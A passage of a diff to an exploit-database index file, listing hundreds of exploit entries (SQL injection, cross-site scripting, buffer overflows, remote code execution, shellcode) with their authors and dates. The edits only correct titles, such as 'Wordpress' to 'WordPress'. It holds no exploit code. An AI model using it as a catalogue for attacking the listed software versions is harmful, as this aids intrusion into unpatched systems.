Upload",2015-02-10,Metasploit,php,webapps,80 -36044,platforms/php/webapps/36044.txt,"PHP Flat File GuestBook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 +36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Plugin - Unrestricted File Upload",2015-02-10,Metasploit,php,webapps,80 +36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 36046,platforms/php/webapps/36046.txt,"phpWebSite - 'page_id' Parameter Cross-Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 36047,platforms/php/webapps/36047.txt,"awiki 20100125 - Multiple Local File Inclusion",2011-08-15,muuratsalo,php,webapps,0 36048,platforms/php/webapps/36048.txt,"phpList 2.10.x - Security Bypass / Information Disclosure",2011-08-15,"Davide Canali",php,webapps,0 36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite",2011-08-17,"High-Tech Bridge SA",windows,remote,0 -36050,platforms/php/webapps/36050.txt,"Wordpress Fast Secure Contact Form 3.0.3.1 Plugin - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 -36051,platforms/php/webapps/36051.txt,"Wordpress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 +36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 Plugin - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 +36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36052,platforms/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local,0 36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow Exploit (1)",2015-02-11,"dogo h@ck",windows,local,0 -36054,platforms/php/webapps/36054.txt,"Wordpress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 +36054,platforms/php/webapps/36054.txt,"WordPress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 -36061,platforms/php/webapps/36061.php,"Wordpress Webdorado Spider Event Calendar 1.4.9 Plugin - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 +36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 Plugin - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0 36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu - 'category.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu - 'main.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 -36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionaire SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 +36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting",2011-08-18,G.R0b1n,cfm,webapps,0 36068,platforms/php/webapps/36068.txt,"MantisBT 1.1.8 - Cross-Site Scripting / SQL Injection",2011-08-18,Net.Edit0r,php,webapps,0 36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 - Remote Buffer Overflow",2011-08-19,KedAns-Dz,windows,dos,0 @@ -32520,16 +32523,16 @@ id,file,description,date,author,platform,type,port 36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 -36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'filemanager/controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 +36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0 -36087,platforms/php/webapps/36087.txt,"Wordpress Fancybox 3.0.2 Plugin - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0 +36087,platforms/php/webapps/36087.txt,"WordPress Fancybox 3.0.2 Plugin - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0 36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 36090,platforms/php/webapps/36090.txt,"ClickCMS - Denial of Service / CAPTCHA Bypass",2011-08-29,MustLive,php,webapps,0 36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0 -36092,platforms/windows/dos/36092.pl,"MapServer 6.0 - .Map File Double Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0 +36092,platforms/windows/dos/36092.pl,"MapServer 6.0 - '.Map' File Double-Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0 36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection",2011-08-30,Net.Edit0r,php,webapps,0 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,php,webapps,0 36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 @@ -32568,16 +32571,16 @@ id,file,description,date,author,platform,type,port 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0 36411,platforms/win_x86/shellcode/36411.txt,"Windows XP x86-64 - Download & execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86,shellcode,0 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 -36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 -36135,platforms/php/webapps/36135.txt,"Wordpress Auctions Plugin 1.8.8 - 'wpa_id' Parameter SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 +36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Parameter Multiple URI Open redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 +36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 - 'wpa_id' Parameter SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Inclusion",2011-09-15,KedAns-Dz,php,webapps,0 36137,platforms/php/webapps/36137.txt,"PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0 36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products - Multiple SQL Injections",2011-09-17,m3rciL3Ss,asp,webapps,0 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting",2011-09-19,"Gjoko Krstic",php,webapps,0 36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross-Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 -36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' parameters Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 -36143,platforms/osx/local/36143.txt,"Apple Mac OSX Lion - Directory Services Security Bypass",2011-09-19,"Defence in Depth",osx,local,0 +36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' Parameters Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 +36143,platforms/osx/local/36143.txt,"Apple Mac OS X (Lion) - Directory Services Security Bypass",2011-09-19,"Defence in Depth",osx,local,0 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 - Multiple SQL Injections",2011-09-19,Net.Edit0r,php,webapps,0 36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Parameter Cross-Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 @@ -32591,16 +32594,16 @@ id,file,description,date,author,platform,type,port 36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Persistent Cross-Site Scripting",2015-02-23,"Halil Dalabasmaz",php,webapps,0 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80 -36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80 +36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80 36158,platforms/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",php,dos,0 36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 -36161,platforms/php/webapps/36161.txt,"Wordpress Easy Social Icons Plugin 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80 +36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80 36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - bin/view/Main/Jump newtopic Parameter Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0 36163,platforms/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin - Slide Show Pages URI Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0 36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 -36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10 / Wordpress 3.1.x / DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection",2011-09-26,knull,php,webapps,0 +36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10 / WordPress 3.1.x / DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection",2011-09-26,knull,php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 - 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0 @@ -32611,24 +32614,24 @@ id,file,description,date,author,platform,type,port 36175,platforms/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps,0 36176,platforms/php/webapps/36176.txt,"Joomla! 1.7.0 and Prior - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0 36177,platforms/php/webapps/36177.txt,"Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps,0 -36178,platforms/php/webapps/36178.txt,"Wordpress Atahualpa Theme 3.6.7 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36179,platforms/php/webapps/36179.txt,"Wordpress Hybrid Theme 0.9 - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36180,platforms/php/webapps/36180.txt,"Wordpress F8 Lite Theme 4.2.1 - 's' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36181,platforms/php/webapps/36181.txt,"Wordpress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36182,platforms/php/webapps/36182.txt,"Wordpress EvoLve Theme 1.2.5 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36183,platforms/php/webapps/36183.txt,"Wordpress Cover WP Theme 1.6.5 - 's' Parameter Cross-Site Scripting",2011-09-24,jabdah,php,webapps,0 -36184,platforms/php/webapps/36184.txt,"Wordpress Web Minimalist Theme 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36185,platforms/php/webapps/36185.txt,"Wordpress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36186,platforms/php/webapps/36186.txt,"Wordpress Morning Coffee Theme 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 -36187,platforms/php/webapps/36187.txt,"Wordpress Black-LetterHead Theme 1.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36178,platforms/php/webapps/36178.txt,"WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36179,platforms/php/webapps/36179.txt,"WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36180,platforms/php/webapps/36180.txt,"WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36181,platforms/php/webapps/36181.txt,"WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36182,platforms/php/webapps/36182.txt,"WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36183,platforms/php/webapps/36183.txt,"WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross-Site Scripting",2011-09-24,jabdah,php,webapps,0 +36184,platforms/php/webapps/36184.txt,"WordPress Web Minimalist Theme 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0 36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0 36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption (PoC)",2015-02-26,"Andras Kabai",linux,dos,0 -36191,platforms/php/webapps/36191.txt,"Wordpress RedLine Theme 1.65 - 's' Parameter Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 - 's' Parameter Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36192,platforms/php/webapps/36192.txt,"A2CMS - 'index.php' Local File Disclosure",2011-09-28,St493r,php,webapps,0 -36193,platforms/php/webapps/36193.txt,"Wordpress WP Bannerize 2.8.7 Plugin - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 +36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 Plugin - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 - 'more' Object HTML Injection",2011-09-30,"Paul Davis",php,webapps,0 -36195,platforms/php/webapps/36195.txt,"Wordpress Trending 0.1 Theme - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 Theme - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 36196,platforms/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' Parameter SQL Injection",2011-10-02,Rem0ve,php,webapps,0 36197,platforms/php/webapps/36197.txt,"ezCourses - admin.asp Security Bypass",2011-10-01,J.O,php,webapps,0 36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial Of Service",2011-10-01,"Usman Saeed",multiple,dos,0 @@ -32638,12 +32641,12 @@ id,file,description,date,author,platform,type,port 36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 -36205,platforms/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 +36205,platforms/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",windows,remote,3465 36207,platforms/windows/local/36207.py,"Microsoft Word 2007 - RTF Object Confusion (ASLR + DEP Bypass)",2015-02-28,R-73eN,windows,local,0 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 -36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0 +36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0 36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 @@ -32652,23 +32655,23 @@ id,file,description,date,author,platform,type,port 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0 36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0 -36217,platforms/windows/remote/36217.txt,"GoAhead Webserver 2.18 - addgroup.asp group Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 -36218,platforms/windows/remote/36218.txt,"GoAhead Webserver 2.18 - addlimit.asp url Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 -36219,platforms/windows/remote/36219.txt,"GoAhead Webserver 2.18 - adduser.asp Multiple Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 +36217,platforms/windows/remote/36217.txt,"GoAhead WebServer 2.18 - addgroup.asp group Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 +36218,platforms/windows/remote/36218.txt,"GoAhead WebServer 2.18 - addlimit.asp url Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 +36219,platforms/windows/remote/36219.txt,"GoAhead WebServer 2.18 - adduser.asp Multiple Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 36220,platforms/php/webapps/36220.txt,"Joomla! 'com_tree' Component - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36221,platforms/php/webapps/36221.txt,"Joomla! 'com_br' Component - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36222,platforms/php/webapps/36222.txt,"Joomla! 'com_shop' Component - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0 36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0 36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 - Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0 -36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 +36226,platforms/php/webapps/36226.txt,"Silverstripe 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0 -36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 +36230,platforms/php/webapps/36230.txt,"Calculated Fields Form WordPress Plugin 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 -36233,platforms/php/webapps/36233.txt,"Wordpress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 +36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 - Buffer Overflow / Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0 36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Parameter Multiple SQL Injection",2011-10-14,m3rciL3Ss,php,webapps,0 @@ -32677,10 +32680,10 @@ id,file,description,date,author,platform,type,port 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 -36242,platforms/php/webapps/36242.txt,"Wordpress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,php,webapps,0 -36243,platforms/php/webapps/36243.txt,"Wordpress cp-multi-view-calendar 1.1.4 Plugin - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 +36242,platforms/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,php,webapps,0 +36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar 1.1.4 Plugin - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 -36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web component - Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 +36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web Component - Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 36248,platforms/php/webapps/36248.txt,"osCommerce - Remote File Upload / File Disclosure",2011-10-20,indoushka,php,webapps,0 36249,platforms/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0 36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0 @@ -32690,7 +32693,7 @@ id,file,description,date,author,platform,type,port 36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion",2011-10-25,"Null H4ck3r",php,webapps,0 36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 